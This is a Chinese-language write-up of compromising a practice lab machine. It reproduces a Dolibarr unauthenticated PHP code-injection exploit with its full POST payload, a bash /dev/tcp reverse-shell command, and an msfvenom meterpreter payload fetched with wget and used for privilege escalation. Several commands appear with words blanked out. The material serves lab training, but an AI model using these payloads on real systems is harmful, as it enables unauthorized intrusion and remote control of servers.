靶機下載鏈接：

點我直接下載靶機

如果不會導入上的靶機，請點擊我直達發車文章 在下面的操作中如果有不懂的可以直接私信博主 滲透概括 web域名破解子域爆破web目錄爆破搭建（用于配置靶機web）php代碼注入制作反彈的模塊提權 虛擬機的IP配置

通過arp- -l來獲取當前網段的存活ip。

再根據創建虛擬機的時候的MAC地址就可以拿到靶機的IP

滲透目標： 第一步：信息收集

我們這里用nmap -sS -sV -A -T4 -p- IP對靶機進行全端口綜合掃描

掃描結果如下

通過nmap掃描發現開放了http/80和ssh/22這兩個端口，ssh的服務一般除了弱口令就沒什么可以直接利用的洞了（如果有，一點要私信博主討論）

第二步：滲透測試

看來這個靶機滲透思路就是要從http下手了，我們接下來訪問一下這個靶機的web服務

發現是一個搭建的網站，這個頁面是的默認頁（這里挺奇怪的，nmap掃的時候中間件是，結果主頁卻是，有點奇怪的東西在里面）

Ctrl+u查看網頁的源碼，也沒發現什么特別的地方。如下兩圖

既然都沒有我們就直接用爆破目錄

發現居然什么都沒有掃描到，只有一個主界面的.html文件（下圖）

gobuster dir -u http://192.168.100.33/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,html,txt

后來博主在一個滲透大佬那了解到，要給這個靶機一個"doli.thm"的域名和一個"erp.doli.thm"的子域（這個子域是爆出來的）

根據如下操作給文件添加這個靶機的ip和域名解析

PS:該靶機的項目

第三步：php代碼注入

我們用" doli"搜一下這個項目的exp

發現了一個PHP的代碼注入的說明文件。

我們cat一下看看這個說明文件，如下

┌──(root?kali)-[~]
└─# cat /usr/share/exploitdb/exploits/php/webapps/44964.txt
# Exploit Title: Unauthenticated Remote Code evaluation in Dolibarr ERP CRM =<7.0.3
# Date: 06/29/2018
# Exploit Author: om3rcitak - https://omercitak.com
# Vendor Homepage: https://dolibarr.org
# Software link: https://github.com/Dolibarr/dolibarr
# Version: =<7.0.3
# Tested on: Unix, Windows
## Technical Details
URL: http://{domain}/{dolibarr_path}/install/step1.php
Parameter Name: db_name
Parameter Type: POST
Attack Pattern: x\';system($_GET[cmd]);//
## Steps to reproduce the behavior
- Go to fresh install page.
- Click "Next Step" button for create example config file (conf/conf.php)
- Send this request:
```
POST {dolibarr_path}/install/step1.php HTTP/1.1
Host: {domain}
testpost=ok&action=set&main_dir=C%3A%2FAmpps%2Fwww&main_data_dir=C%3A%2FAmpps%2Fwww%2Fdocuments&main_url=http%3A%2F%2Flocalhost+&db_name=x%5C%27%3Bsystem(%24_GET%5Bcmd%5D)%3B%2F%2F&db_type=mysqli&db_host=localhost&db_port=3306&db_prefix=llx_&db_create_database=on&db_user=root&db_pass=root&db_create_user=on&db_user_root=root&db_pass_root=root&selectlang=auto
```
- Visit url and run the command: `http://{domain}/{dolibarr_path}/install/check.php?cmd=cat /etc/passwd`
## Timeline
- 06/29/2018 18:30 - Found vulnerability.
- 06/29/2018 18:44 - Report vendor.
- 06/29/2018 20:38 - Vulnerability fixed by vendor.
GitHub Issue: https://github.com/Dolibarr/dolibarr/issues/9032

這個說明文件大概內容就是

通過修改這個數據庫的配置文件發出請求的(改為這個說明文件上面的exp代碼就可以完成注入)

然后再通過這個網站的//.php的安裝文件來利用這個注入進去的代碼

那么下面開始實操

我們通過工具來爆一下//下面的目錄

dir -u -w /usr////-list-2.3-.txt -x php

發現了一個.php的php文件，并且302到的位置有一個/Seth.php?=ok的參數，所以是這個文件沒錯了

那么我們訪問一下這個php文件

我們直接拉到這個網站最底下，點擊這個star按鈕

點擊那個按鈕之后即可跳轉到如下的配置界面

下面的操作需要在Kali搭建數據庫（可以先自己看看教程），否則無法利用

根據那個.txt說明文件數據庫搭建好之后我們需要使用來抓包，來修改字段

點擊那個按鈕之后我們的就會彈出來，如下圖

我們需要修改參數里面的值

=x%5C%27%(%%%5D)%3B%2F%2F

發送之后我們接下再來訪問一下.php界面

會發現自動跳轉到了Seth.php界面了，如下圖

我們現在給Seth.php傳一下cmd=，發現正常返回了當前的用戶名了

第四步：！！！

我們使用kali利用nc工具監聽一下1234端口，用于獲取反彈

我們在給cmd參數注入如下命令，然后回車

bash+-c+%+-i+%3E%26+/dev/tcp/192.168.100.7/1234+0%3E%261%27

可以看到下圖，我們的nc監聽的端口拿到了web反彈下來的了

第五步：提權

我們對的日志目錄進行審查一下，如下

#到/var/log/nginx目錄下
www-data@Doli:/tmp$ cd /var/log/nginx
#用ls =al發現有一個.bk的可疑文件
www-data@Doli:/var/log/nginx$ ls -al
total 535240
drwxr-xr-x  3 root     adm           4096 Mar 22  2021 .
drwxrwxr-x 10 root     syslog        4096 Nov 26 15:35 ..
drwxr-xr-x  2 www-data www-data      4096 Mar 22  2021 .bk
-rw-r-----  1 www-data adm      338119216 Nov 26 23:52 access.log
-rw-r-----  1 www-data adm      209943239 Nov 26 23:43 error.log
#cd到這個.bk文件里面
www-data@Doli:/var/log/nginx$ cd .bk
#再用ls -al看一下，發現了一個access.log.bk文件
www-data@Doli:/var/log/nginx/.bk$ ls -al
total 180
drwxr-xr-x 2 www-data www-data   4096 Mar 22  2021 .
drwxr-xr-x 3 root     adm        4096 Mar 22  2021 ..
-rw-r----- 1 www-data www-data 175190 Mar 21  2021 access.log.bk

我們用cat看看這個.log.bk文件，往里下面慢慢翻，發現了一個被編碼的GET請求

172.16.1.1 - - [20/Mar/2021:13:03:38 +0000] "GET/5455644852464247526b464a526b4e4254455a435155314752304651516b5a4653554e4453464243526b564a5304e45544564435245314652304a4c5155464754304646526b74425155593d HTTP/1.1" 403 152 "-""Mozilla/5.0 (X11; Linux x86_64; rv:86.0) Gecko/20100101 Firefox/86.0"

我們現在找找其他的關鍵線索

前往/opt目錄找找，如下操作

#我們現在切換到/opt目錄
www-data@Doli:/var/log/nginx/.bk$ cd /opt
#用ls -al看一下，發現了一個ViewMe.png文件
www-data@Doli:/opt$ ls -al
total 44
drwxr-xr-x   4 root     root      4096 Mar 22  2021 .
drwxr-xr-x  23 root     root      4096 Nov 26 15:35 ..
-rw-r--r--   1 www-data www-data 21494 Oct 22  2013 ViewMe.png
drwxrwxr-x+  2 c3p0     c3p0      4096 Mar 21  2021 playbooks
dr--------   2 root     root      4096 Mar 21  2021 secrets
-rwxrwxr-x   1 root     m3dsec      55 Mar 22  2021 stewie.el
我們把這個文件拷貝到這個網站的install目錄下
www-data@Doli:/opt$ cp ViewMe.png /var/www/dolibarr/htdocs/install/

我們通過訪問

如下，發現了一個寫著一個CiTR!X的字樣(盲猜編碼)，這應該是一個加密方法

我們訪問 (gchq..io)這個頁面，對我們上面獲得編碼信息進行解碼

可以看到處就出現了一個@@的密碼

如下圖，我們到/home目錄下看到工號有一個c3p0的用戶

我們用我們獲取到的密碼ssh登錄一下c3p0這個用戶，如下圖，成功登錄

我們現在回到kali里面去 ，用生成一個的載荷

msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=192.168.100.7 LPORT=5678 -f elf > shell.elf

再拿開一個http服務，好用靶機的wget下載這個生成好的文件

我們再開一個終端，進入msf里面，使用//模塊并配置一下監聽地址和

如下圖操作所示

現在我們再到ssh連接的這里來，用wget下載一下這個

并且用" +x .elf"命令給這個文件一個執行權限，并用./.elf執行這個文件

執行完之后，我們就會發現我們之前在msf的模塊已經監聽到了反彈過來的

我們在這里執行一下""命令，把這個會話保存到后臺去

我們使用msf的"http://"模塊給靶機提權

根據下圖進行操作

攻擊成功之后，我們用命令進入到靶機的命令行，進行如下操作

獲取到flag之后我們的靶機就已經滲透完成